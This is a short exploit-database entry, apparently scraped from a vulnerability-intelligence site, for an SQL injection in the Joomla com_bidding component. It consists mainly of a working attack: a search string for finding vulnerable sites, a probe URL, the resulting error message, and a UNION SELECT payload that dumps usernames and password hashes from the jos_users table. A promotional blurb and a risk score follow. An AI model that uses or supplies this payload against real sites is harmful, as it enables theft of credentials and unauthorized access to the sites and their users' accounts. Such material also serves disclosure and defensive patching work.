Lucene search
Joomla Component com_bidding SQL Injection Vulnerability
Joomla com_bidding SQL Injection Vulnerabilit
Show more
========================================================
Joomla Component com_bidding SQL Injection Vulnerability
========================================================
# Searching = "option=com_bidding"
==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--
# error =
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"
==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--
# 0day.today [2018-04-09] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo16 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1